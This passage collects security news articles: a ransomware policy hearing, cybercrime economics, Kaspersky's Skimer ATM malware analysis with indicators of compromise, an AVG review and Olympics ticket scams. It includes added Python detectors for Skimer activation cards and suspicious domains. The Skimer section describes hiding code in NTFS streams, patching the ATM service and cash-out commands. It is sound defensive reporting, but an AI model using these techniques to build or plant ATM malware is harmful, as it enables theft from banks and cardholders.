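On the constructed data the scan reports three offsets and 37.5% coverage, and the 29 zero-filled sectors of the image produce no hits even though the known file itself contains a zero block. Against a real image the same loop runs over the raw device, and the table is built from the files you are looking for, not the other way round.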

A privacy annoyance for sure, yet when Macs are hacked and sensitive data is encrypted before exfiltration, this artifact can help assess the damage.

Forensic Research Matters

Traditionally, the security industry has focused on malware, email filters, and patching machines. Yet we must look at the bigger picture.

The promise of perimeter defense is gone.

Breaches are now fought inside our walls, over many months, and across many endpoints. We should start looking at where breaches intersect user accounts: initially, during delivery of social engineering attacks against employees, and then in the months-long campaigns of lateral movement and exploration of sensitive data, which often involve remote sessions from compromised accounts. In an age where so much of our lives is touched by the Web and mobile computing, and where our hidden personal lives leave forensic residue everywhere, society should pay more attention to this summer's digital forensic discoveries.

Paul Shomo is a senior technical manager at Guidance Software, Inc. He first joined Guidance's new product research group in 2006, which launched the industry's first incident response solution.

For years Paul managed and architected cybersecurity and forensic products, and ...

TeslaCrypt's Master Key Released To The Public

TeslaCrypt's master key has been released to the public, shutting down the ransomware for good in an unexpected twist in the malware's story. TeslaCrypt, which...

Time To Treat Sponsors Of Ransomware Campaigns As Terrorists, Lawmaker Says

Fighting ransomware at an international level will require cooperation between law enforcement and the State Department, Sen. Lindsey Graham said at a Senate hearing.

A senior lawmaker Wednesday hinted that nations not doing enough to stop ransomware groups from operating within their countries should be treated in the same way that the US treats countries that sponsor terror groups.

In opening comments at a Senate Judiciary subcommittee hearing Wednesday, Senator Lindsey Graham described ransomware attacks as a "terrible crime" affecting schools, hospitals, and the lives of thousands of others. "[Ransomware] has a psychological, violent aspect to it," Graham said. "It is just a matter of time before somebody gets physically hurt," he said, while expressing the government's intention to give law enforcement the tools needed to combat the scourge.

"Maybe what we should think about when it comes to the nation state aspect of [ransomware] is to have a collaboration between the Department of Justice and maybe the State Department," he said. The goal should be to identify nations that are doing a good job in trying to deal with the problem and to help them in that effort, while weeding out the ones that are not doing enough or are actively sponsoring such attacks.

"We have a state-sponsor of terrorism list that the State Department collects," Graham noted. "If you are on that list, bad things come your way because you are a bad actor." Graham said it may be time to consider adopting a similar approach to countries that are either aiding and abetting ransomware operators or not doing enough to stop them: "If we don't wake up some of the nation-states where these problems reside in large measure, you are never going to fix this problem."

Richard Downing, deputy attorney general at the US Department of Justice and one of the witnesses at the hearing, characterized the scope of the ransomware problem as "staggering." One of his recommendations is for Congress to enact legislation that will close loopholes in existing laws and make it easier for the FBI and law enforcement in general to pursue and prosecute those involved in ransomware schemes. Current statutes such as the Computer Fraud and Abuse Act (CFAA) already make it a crime to create botnets by breaking into computers, or to use a botnet to carry out ransomware attacks.

But the law is less clear on the implications for people who might be renting or selling a botnet but are not actually using it, he said. Similarly, while federal law gives courts the authority to issue injunctions for disrupting the operation of a botnet, such action is limited to botnets that are being actively used to commit specific categories of crime.

There is little in existing law pertaining to what actions law enforcement would be able to take in situations where a botnet might be used to send phishing emails or to launch denial of service attacks, or if a botnet is known to exist but is inactive, Downing said. “The revenue generated by ransomware is not insignificant,” said Adam Meyers, vice president of intelligence at security vendor CrowdStrike, who also spoke as a witness at the hearing. The only way to slow down those behind such campaigns is to make it harder and costlier for them to operate, Meyers said.

The goal should be to make the potential downsides of running a ransomware campaign greater than any upside for the criminals. Only by turning the tables on the economic factors that fuel ransomware can the scourge be eliminated, he said.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...

Cybercrooks Think More Like CEOs And Consultants Than You Think

Speaking the language of the board room, and understanding things like value chain and SWOT analysis, might help you speak the language of the adversary. As enterprise security leaders plan out their IT risk management strategies, it is absolutely crucial that they understand the business motives behind cybercrime.

Criminal profits drive the vast majority of security incidents today, and the cybercrime marketplace has coalesced to the point where most organized cyber criminals have a sophisticated value chain supporting the delivery of numerous thieving lines of business.
It has gotten to the point that the most damaging cyber crooks think more like CEOs and consultants than techies.

The better that enterprises can understand their adversaries' mindset, the more effective they'll be at reducing risk, explains a new report by Hewlett Packard Enterprise. "To truly disrupt the business of hacking is to increase the cost of the attacker’s business, erode their profits, and increase the time it takes to successfully execute an attack and sale," explained the report, which took a thorough look at the gears turning the cyber underground. The paper took a deep dive into 10 different types of businesses supported by this mature marketplace -- including old reliable kinds like ad fraud, extortion, or credential harvesting -- and analyzed them based on profit variables.
It also explained a lot of the guiding principles, culture, and market conditions that drive cybercrime today.

The nut of it is that cybercrime looks more like an enterprise than many people might think. For example, the authors highlighted the fact that some cybercriminals even operate on banker's hours, running 9 a.m. to 4 p.m., Monday through Friday, with Monday the busiest day of the week as the bad guys catch up from the weekend. Among the highlights, there are three big ways in which the cyber underground has evolved, an understanding of which could potentially help CISOs and other security leaders.

The Value Chain Is Intricate

The business of cybercrime is highly segmented and specialized, with a value chain that contributes to the "end product" of theft and fraud.

This includes subcomponents that fit within categories like human development (including recruitment and education) as well as operations, technical development, and marketing and sales.

Each Line Of Business Follows A Maturity Curve

The different types of fraud and theft follow an industry growth maturity curve, much as a line of business or product line would within a legitimate business. "The progression of credit card fraud provides a good example of this maturity curve. While there is still big money to be made in credit card fraud, the market is flooded and the business is in the declining phase," the report explains. "The introduction of EMV chip and pin cards in the United States will make it harder for attackers to make money on 'card-present' transaction fraud.

Even slowing them down a little will negatively affect their profits and we should do it more often.

The maturity curve restarts when new technologies are introduced, such as mobile payments.

This full curve can mature much faster in cyber businesses than in traditional business."

Their SWOT Analysis Probably Looks Like Yours

Most savvy cybercriminals will weigh their costs and risks carefully against the potential payout for whatever line of business they operate within. More than likely, their strengths, weaknesses, opportunities, and threats (SWOT) analysis looks a lot like a typical legitimate business's.

Coming from the lawful side of this, enterprises also need to understand this SWOT grid to be able to diminish the strengths and opportunities of these adversaries while playing up their weaknesses and threats. "By knowing our competitors' business goals, strengths, and weaknesses we can arrive at ways to reduce their competitive advantage," the report explains. "If attackers want to increase their profits, it is our job as their competitor to reduce their profits."

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.

ATM infector

Seven years ago, in 2009, we saw a completely new type of attack on banks. Instead of infecting the computers of thousands of users worldwide, criminals went directly after the ATM itself, infecting it with malware called Skimer. Seven years later, our Global Research and Analysis Team, together with our Penetration Testing Team, was called in for an incident response.

They discovered a new, improved version of Skimer.

Virus style infections

Criminals often obscure their malware with packers to make analysis more difficult for researchers.

The criminals behind Skimer also did this, using the commercially available packer Themida, which packs both the infector and the dropper. Once the malware is executed it checks whether the file system is FAT32.
If it is, it drops the file netmgr.dll in the folder C:\Windows\System32.
If it is an NTFS file system, the same file is placed instead in an NTFS alternate data stream attached to the XFS service's executable file. Placing the file in an NTFS data stream is most likely done to make forensic analysis more difficult: the stream does not appear in ordinary directory listings and does not change the reported size of the host file. After successful installation, the sample patches the entry point of the XFS executable (SpiService.exe) to add a LoadLibrary call for the dropped netmgr.dll.

This file is also protected by Themida.

Figure: Entry point in SpiService.exe before infection

Figure: Entry point in SpiService.exe after infection

After a successful installation the ATM is rebooted.

The malicious library is loaded into SpiService.exe thanks to the new LoadLibrary call, giving it full access to XFS.

Functionality

Unlike Tyupkin, which used a magic code and a specific time window during which the malware was active, Skimer only wakes up when a magic card (one carrying specific Track 2 data; see the IOCs at the bottom of this blogpost) is inserted.
It is a smart way to implement access control to the malware's functionality. Once the magic card is inserted, the malware is ready to interact with two different types of cards, each with different functions:

Card type 1 – request commands through the interface
Card type 2 – execute the command hardcoded in the Track 2

After the card is ejected, the user is presented with a form asking them to enter the session key in less than 60 seconds. The user is now authenticated, and the malware accepts 21 different codes for controlling its activity.

These codes are entered on the PIN pad. Below is a list of the most important features:

Show installation details;
Dispense money – 40 notes from the specified cassette;
Start collecting the details of inserted cards;
Print collected card details;
Self delete;
Debug mode;
Update (the updated malware code is embedded on the card).

During its activity, the malware also creates the following files or NTFS streams (depending on the file system type).

These files are used by the malware at different stages of its activity, for storing its configuration, storing skimmed card data and logging its activity:

C:\Windows\Temp\attrib1 – card data collected from network traffic or from the card reader;
C:\Windows\Temp\attrib4 – logs data from the APIs responsible for communication with the keyboard (effectively logging data such as the PIN);
C:\Windows\Temp\mk32 – same as attrib4;
C:\Windows\Temp:attrib1 – same as the homologous file;
C:\Windows\Temp:attrib4 – same as the homologous file;
C:\Windows\Temp:mk32 – same as the homologous file;
C:\Windows\Temp:opt – logs the mule's activity.

Conclusions

During our recent Incident Response cases related to the abuse of ATMs, we have identified Tyupkin, Carbanak and black box attacks.

The evolution of Backdoor.Win32.Skimer demonstrates the attackers' interest in these malware families, as ATMs are a very convenient cash-out mechanism for criminals. One important detail to note about this case is the hardcoded information in the Track 2: the malware waits for it to be inserted into the ATM in order to activate.

Banks may be able to proactively look for these card numbers inside their processing systems, detect potentially infected ATMs and money mules, or block attempts to activate the malware. We also recommend regular AV scans, the use of whitelisting technologies, a good device management policy, full disk encryption, protecting the ATM BIOS with a password, only allowing booting from the HDD, and isolating the ATM network from any other internal bank networks. Kaspersky Lab has now identified 49 modifications of this malware, with 37 of these modifications targeting ATMs made by just one manufacturer.
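As an added example of the kind of check a bank can run over its processing records (this is our illustration, not Kaspersky Lab code or tooling), the matcher below turns each masked Track 2 pattern from Appendix I into an anchored regular expression and reports every transaction whose Track 2 matches one of them. It assumes that every `*` in the published patterns stands for exactly one hidden digit. The ATM records are constructed for the example; one of them is deliberately a PCI-masked line, to show that the matching has to run where the full PAN is visible (the authorization host or the ATM's journal), because logs that keep only the first six and last four digits can never match.

```python
import re

# Masked Track 2 activation patterns as published in Appendix I of this post.
# This example takes each '*' to stand for exactly one hidden digit.
SKIMER_TRACK2_IOCS = [
    "******446987512*=********************",
    "******548965875*=********************",
    "******487470138*=********************",
    "******487470139*=********************",
    "******000000000*=********************",
    "******602207482*=********************",
    "******518134828*=********************",
    "******650680551*=********************",
    "******466513969*=********************",
]

# Constructed authorization records: (ATM id, Track 2 as captured). Two carry
# the partial PANs above; the others are an ordinary card and a PCI-masked line.
SAMPLE_RECORDS = [
    ("ATM-0017", ";4001234469875129=20121010000000000000?"),
    ("ATM-0017", "4111111111111111=25121015432112345678"),
    ("ATM-0042", "5201115489658756=24101000000000000000"),
    ("ATM-0042", "520111******8756=2410"),
]


def ioc_to_regex(masked):
    """Turn a masked Track 2 value into an anchored regex; '*' matches one digit."""
    parts = []
    for ch in masked:
        if ch == "*":
            parts.append(r"\d")
        elif ch == "=" or ch.isdigit():
            parts.append(ch)
        else:
            raise ValueError(f"unexpected character {ch!r} in IOC {masked!r}")
    return re.compile("^" + "".join(parts) + "$")


def normalise_track2(raw):
    """Drop whitespace, the ISO 7813 start sentinel ';' and everything from the
    end sentinel '?' onwards (the LRC), leaving PAN=data as the IOCs are written."""
    s = raw.strip()
    if s.startswith(";"):
        s = s[1:]
    end = s.find("?")
    return s if end < 0 else s[:end]


def find_activation_attempts(records, iocs=SKIMER_TRACK2_IOCS):
    """Return [(atm_id, matched_ioc)] for every record matching an activation pattern."""
    compiled = [(masked, ioc_to_regex(masked)) for masked in iocs]
    hits = []
    for atm_id, raw in records:
        track2 = normalise_track2(raw)
        for masked, rx in compiled:
            if rx.match(track2):
                hits.append((atm_id, masked))
                break
    return hits


if __name__ == "__main__":
    for atm_id, masked in find_activation_attempts(SAMPLE_RECORDS):
        print(f"{atm_id}: card inserted matching activation pattern {masked}")
```

A hit on an ATM is a strong signal that the machine is infected and that a mule is standing in front of it at that moment, so the alert belongs in the fraud and physical-security queues, not only in the SOC's. The masked fourth record produces no hit, which is the point: run this on the system that still sees the whole PAN.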

The most recent version was discovered at the beginning of May 2016. All samples described are detected by Kaspersky Lab as Backdoor.Win32.Skimer. Patched SpiService.exe files are detected as Trojan.Win32.Patched.rb. As this is still an ongoing investigation, we have already shared the full report with different LEAs, CERTs, financial institutions and Kaspersky Lab Threat Intelligence Service customers.

For more information please contact intelreports@kaspersky.com

Appendix I. Indicators of Compromise

Hashes

F19B2E94DDFCC7BCEE9C2065EBEAA66C
3c434d7b73be228dfa4fb3f9367910d3
a67d3a0974f0941f1860cb81ebc4c37c
D0431E71EBE8A09F02BB858A0B9B8038
035484d750f13e763eae758a5f243133
e563e3113918a59745e98e2a425b4e81
a7441033925c390ddfc360b545750ff4

Filenames

C:\Windows\Temp\attrib1
C:\Windows\Temp\attrib4
C:\Windows\Temp\mk32
C:\Windows\Temp:attrib1
C:\Windows\Temp:attrib4
C:\Windows\Temp:mk32
C:\Windows\Temp:opt
C:\Windows\System32\netmgr.dll

Track 2 data

******446987512*=********************
******548965875*=********************
******487470138*=********************
******487470139*=********************
******000000000*=********************
******602207482*=********************
******518134828*=********************
******650680551*=********************
******466513969*=********************

AVG Protection Free (2016)

The newest big thing in security is the cross-platform multi-device security suite.
Instead of seeking out different products for your Windows, Mac, and mobile devices, you use the same multi-device subscription on all of them, and you can manage them from a central console.
Some offer a specific number of licenses, others aren't limited.

AVG Protection Free (2016) has the distinction of offering multi-device protection at no cost. However, that great price point can't outweigh the fact that the security protection it offers doesn't measure up to that of the top products in this field.

AVG Protection Free helps you manage installations of AVG's free antivirus products for Windows, Mac OS, and Android (sorry, no iOS support). You can choose a 30-day trial of the non-free AVG Protection (2016).
If you do so and then decide you want to keep the Pro features, you'll pay $59.99 per year for unlimited devices. McAfee LiveSafe (2016) lists for $89.99 per year, for unlimited devices, but it adds support for iOS and Blackberry, and its Mac support is a full suite, not just antivirus like AVG.

For that same $89.99 you could also choose a 10-license subscription for Symantec Norton Security Deluxe, with 25GB of hosted online backup as a bonus. None of the competing services offer a free edition, though.

Very Zen

As with the paid edition, installation of AVG Protection Free starts with AVG Zen, the management tool. You also need to create an online management account.

This account is what links all your devices through Zen. Like most of AVG's products, Zen uses color-coded circles to report your security status in various areas.

Four panels represent Protection, Performance, Safe Surf, and Web Tuneup.

A complete circle means you've got all available protection in the specified area; a partial circle means there's more you could add. When the circle is green, all's well with the world.
If it's yellow or red, the specified component needs attention. I installed AVG Protection on a Windows 8.1 test system, opting to go straight to the free edition rather than start a 30-day trial of the paid version.

As soon as Zen was installed, it started a background installation of the free antivirus. Once that installation completed, I got a three-quarter green circle in the Protection panel.

Completing that circle would require upgrading to the paid edition, so I left it alone. Clicking the Web TuneUp panel smoothly installed that feature on my browsers, giving me a complete green circle in that panel. Web TuneUp warns when you're about to visit an iffy or dangerous site, actively prevents tracking of your Web surfing habits, and lets you clear your browser history with one click. Safe Surf, AVG's VPN, is an extra cost, so that panel stayed blank.

As for the Performance panel, clicking that one installed AVG PC TuneUp. Note, though, that this is a one-day free trial, so don't start it until you have some free time to exercise this tool's powerful performance enhancement features. Extending protection to additional devices is a snap. You click a button to start the process, choose Windows, Mac OS, or Android, and send an email to an account used on the device in question.

The email contains a link to download the appropriate app.
Install Zen, install the antivirus, and link the installation to your account by logging in.

That's it.

The new device shows up in Zen's lineup across the top. You can check the status of any device by clicking it, and you can even remotely launch a scan or an update.

Protection for Windows

On your Windows devices, AVG Protection installs AVG AntiVirus Free (2016).

Do please read that review for full details on the antivirus.
I will summarize my findings here. All five of the antivirus testing labs I follow include AVG in their evaluations. My aggregate lab test score calculation for AVG gives it 8.4 of 10 possible points. Kaspersky holds the best aggregate score, 9.7 points. In my own hands-on testing, AVG earned 8.8 of 10 possible points, which is good, but not at the top.

Top score among products tested with the same samples goes to Bitdefender Total Security 2016, with 9.3 points.

Tested against a newer sample set, Webroot SecureAnywhere Internet Security Complete (2016) managed a perfect 10. In my malicious URL blocking test, AVG blocked 73 percent of the samples.
Symantec Norton Security Premium blocked 91 percent of the malware downloads, and Avira Antivirus Pro 2016 fended off 99 percent.
In my antiphishing test, AVG lagged 28 percentage points behind Norton. This product's antivirus protection isn't quite as good as the very best commercial antivirus tools, but it's impressive for a free antivirus.

AVG AntiVirus Free is an Editors' Choice for free antivirus, sharing that honor with Avast Free Antivirus 2016 and Panda Free Antivirus (2016).

Protection for Android

To get a feel for AVG's Android protection, I sent a link to a Nexus 9 that I use for testing.

The user interface has changed since we reviewed AVG AntiVirus Security (for Android); no more color-coded circles! But the feature set remains effectively the same; refer to that review for additional details. Zen on the tablet retains those familiar circles, and works just as it does on Windows. For a complete installation, you need to enable Anti-Theft and make AVG a Device Administrator. You'll probably also want to click the link that installs the free AVG Cleaner for Android.

As with AVG Protection itself, you can opt to get a 30-day trial of the paid edition.
I chose not to do so, and therefore found myself viewing banner ads across the bottom of the app's display. AVG scans your apps for malware and can optionally scan external storage.
It also finds and flags problems with security settings, offering instructions for correcting configuration errors.

The Safe Web Surfing feature steers your browser away from malicious and fraudulent URLs. Performance features include a task killer, to save battery life by ending unnecessary tasks, as well as a battery power tracker with an option to automatically turn off power-hungry features when battery power gets low.

AVG can also track your storage usage and monitor use of your data plan by apps. There's probably a better chance your Android device will be lost or stolen than that it will suffer a malware attack.

AVG offers a full-scale anti-theft component. You can use coded text messages or the online console to remotely locate, lock, or wipe the device, or trigger a noise to help you find a mislaid tablet.

That's it for the free edition.

The for-pay edition adds Camera Trap, which snaps a thief's photo, and can also lock the device if a thief removes the SIM card.
It can protect private data and user-specified apps with a PIN code.

And it can back up your apps to an SD card. The free app installed by AVG Protection Free includes antivirus and anti-theft, the pillars of an Android security product, but lacks a number of useful features from the paid app. Our Editors' Choice products for Android antivirus are Norton Security and Antivirus (for Android) and Bitdefender Mobile Security and Antivirus (for Android). Like AVG, both of these offer a free edition with only the most necessary features.

Mac Protection

AVG AntiVirus (for Mac) is a free product. You could download and install it without any connection to AVG Protection, but then you'd miss out on the remote-control power of AVG Zen. This free, simple product offers protection against viruses and other types of malware.
It scans on demand and in real time.

To make sure your other devices don't get infected by way of the Mac, it looks for PC and Android malware as well.

And of course you'll find the user interface familiar. Keep those circles green! Norton gives Mac users rather more in the way of features.
It includes a firewall, a vulnerability scanner, and password protection for files, among other things. McAfee LiveSafe is somewhere between, with antivirus, firewall, Web reputation reporting, and password management.

Free Isn't Enough

I rated the paid AVG Protection three stars, meaning it's good, but not outstanding.

For Windows devices, the paid edition installs AVG Internet Security, which doesn't rate as highly as the free antivirus because other components don't measure up.

Android protection in the paid edition is good, but Macs just get a simple always-free antivirus. With AVG Protection Free, the Android app loses Pro-only features and PCs just get a free antivirus—a good one—rather than a full security suite.
It's great that this product is free, and you still get the helpful remote management of AVG Zen, but competing (paid) cross-platform suites offer so much more.
In this instance, you really do get what you pay for. Symantec Norton Security Deluxe excels in just about every area and comes with 25GB of hosted online storage.
It protects PCs and Macs with a full security suite, and its Android version is an Editors' Choice. Where Symantec lets you protect 10 devices, McAfee LiveSafe puts no limit on the number of Windows, Mac OS, Android, iOS, and Blackberry devices you can connect.

These two are our Editors' Choice cross-platform multi-device security suites.

The Rio Olympics: Scammers Already Competing

A few years ago, spammers and scammers were not as interested in the Olympics as they were in football (the World Cup and European Championships).

The first major increase in the number of spam messages devoted to the Olympic Games occurred in the run-up to the Winter Olympics in Sochi in 2014.
Since then, their interest in the Olympics has shown no sign of weakening and the upcoming event in Brazil is no exception. Back in 2015, a year before the Olympics in Rio, we registered fake notifications of lottery wins allegedly organized by the country’s government and the International Olympic Committee.
Similar emails continue to be sent in 2016.

The vast majority of these messages contain a DOC or PDF attachment, while the body of the message includes only a brief text asking the recipient to open the attachment. The name of the DOC file, the name of the sender and the subject line of the email often mention the Olympic Games. The content of these attachments is fairly standard: a lottery was held by an official organization; the recipient’s address was randomly selected from a large number of email addresses, and to claim their winnings the recipient has to respond to the email and provide the necessary personal information. We also came across emails without attachments; the text written by the scammers was included in the body of the message. English is undoubtedly the most popular language used in fraudulent emails exploiting the Olympics theme, but we have also registered messages in other languages, for example Portuguese.
In these the spammers stuck to the same story of a lottery win, trying to convince the recipient that the email is genuine. In addition to fraudulent spam, we have registered unsolicited advertising messages containing offers for various goods and services that, one way or another, use the Olympics to grab the attention of recipients. For example, spammers have been pushing new TVs for watching sporting events. They also promised to make the recipient an “Olympic champion” with the help of magic pills. Taking any of these emails seriously enough to reply to them could well leave you out of pocket.

But the biggest hit that sports fans’ wallets are likely to take comes from fake ticketing services. We are constantly blocking dozens of newly registered domains with names containing the words “rio”, “rio2016” and so on.

Each of these domains hosted good quality imitations of official services offering tickets to sporting events at this summer’s games in Rio de Janeiro. The scammers register these domains to make their sites look more credible; for the same purpose, they often buy the cheapest and simplest SSL certificates.

These certificates are issued within a few minutes, and certification authorities don’t verify the legal existence of the organization applying for them.

The certificates simply provide data transfer over a secure protocol for the domain and, most importantly, give fraudsters the desired “https” at the beginning of their address. If you examine the whois data for such domains, you will find that they have only been registered recently, for a short period of time (usually a year) and in the names of individuals. Moreover, the detailed information is often hidden, and the hosting provider could be located anywhere, from Latin America to Russia. The sites are necessary to implement a simple scam whereby the phishers ask for bank card information, allegedly to pay for tickets, and then use it to steal money from the victim’s bank account.
In order to keep the buyer in the dark for some time, the scammers assure them that the payment has been received for the tickets and that they will be sent out two or three weeks before the event. As a result, the criminals not only steal the victim’s money but deprive them of the chance of attending the Olympics – by the time they realize they won’t be getting the tickets they booked it will be too late to buy genuine tickets… especially if there’s no money in their bank account. According to our information, the creation of these fake sites usually involves international cybercriminal groups, each fulfilling its own part of the scam. One group creates a website, the second registers the domains, the third collects people’s personal information and sells it, and the fourth withdraws the cash. To avoid falling victim to the scammers’ tricks, sports fans should be careful and only buy tickets from authorized reseller sites and ignore resources offering tickets at very low prices.
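The whois traits described above (Olympics keywords in the name, recent registration, a one-year term, an individual or hidden registrant) can be turned into a simple triage check. The following is an added example, not code from the original article; the thresholds, the `WhoisRecord` layout and the sample records are assumptions constructed for illustration.

```python
from dataclasses import dataclass
from datetime import date
from typing import Dict, List

# Keywords the article reports seeing in fraudulent ticketing domains.
SUSPICIOUS_KEYWORDS = ("rio2016", "rio", "olympic")

# Thresholds are assumptions for this example, not figures from the article.
MAX_AGE_DAYS = 180      # "only been registered recently"
MAX_TERM_DAYS = 366     # "for a short period of time (usually a year)"
REFERENCE_DATE = date(2016, 7, 1)   # the "today" used when scoring

@dataclass
class WhoisRecord:
    domain: str
    created: date
    expires: date
    registrant_org: str      # empty when registered in an individual's name
    privacy_protected: bool  # registrant details hidden behind a proxy service

def assess(rec: WhoisRecord, today: date = REFERENCE_DATE) -> List[str]:
    """Return the fraud indicators this whois record exhibits."""
    reasons = []
    label = rec.domain.lower().split(".")[0]
    # Substring match is deliberately loose; "rio" alone will hit unrelated names.
    if any(k in label for k in SUSPICIOUS_KEYWORDS):
        reasons.append("olympics keyword in domain")
    if (today - rec.created).days <= MAX_AGE_DAYS:
        reasons.append("registered recently")
    if (rec.expires - rec.created).days <= MAX_TERM_DAYS:
        reasons.append("short registration term")
    if not rec.registrant_org:
        reasons.append("registered to an individual")
    if rec.privacy_protected:
        reasons.append("registrant details hidden")
    return reasons

def triage(records, today: date = REFERENCE_DATE, min_indicators: int = 3) -> Dict[str, List[str]]:
    """Keep only domains showing at least min_indicators traits, with the reasons."""
    flagged = {}
    for rec in records:
        reasons = assess(rec, today)
        if len(reasons) >= min_indicators:
            flagged[rec.domain] = reasons
    return flagged

# Constructed sample records; these are not real whois data.
SAMPLES = [
    WhoisRecord("rio2016-tickets.example", date(2016, 5, 2), date(2017, 5, 2), "", True),
    WhoisRecord("rio-olympic-seats.example", date(2016, 6, 20), date(2017, 6, 20), "", False),
    WhoisRecord("example.org", date(2010, 1, 15), date(2020, 1, 15), "Example Foundation", False),
]

if __name__ == "__main__":
    for domain, reasons in triage(SAMPLES).items():
        print(domain, "->", ", ".join(reasons))
```

A hit is a reason to look closer, not proof of fraud: legitimate event sites are also registered shortly before an event, so the score should feed a review queue rather than an automatic block.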

The official website of the Olympic Games provides a list of official ticket sellers in your region and a service that allows you to check the legitimacy of sites selling tickets. Also, we strongly recommend not buying anything in stores advertised in spam mailings or advertising banners, whether it’s tickets or souvenirs related to the Olympics.

At best, you’ll end up with non-certified goods of dubious quality, and at worst – you’ll just be wasting your money.

For those who cannot resist impulse purchases, we recommend getting a separate bank card that is only used for online payments and which only ever has small sums of money on it.

This will help to avoid serious losses if your banking information is stolen.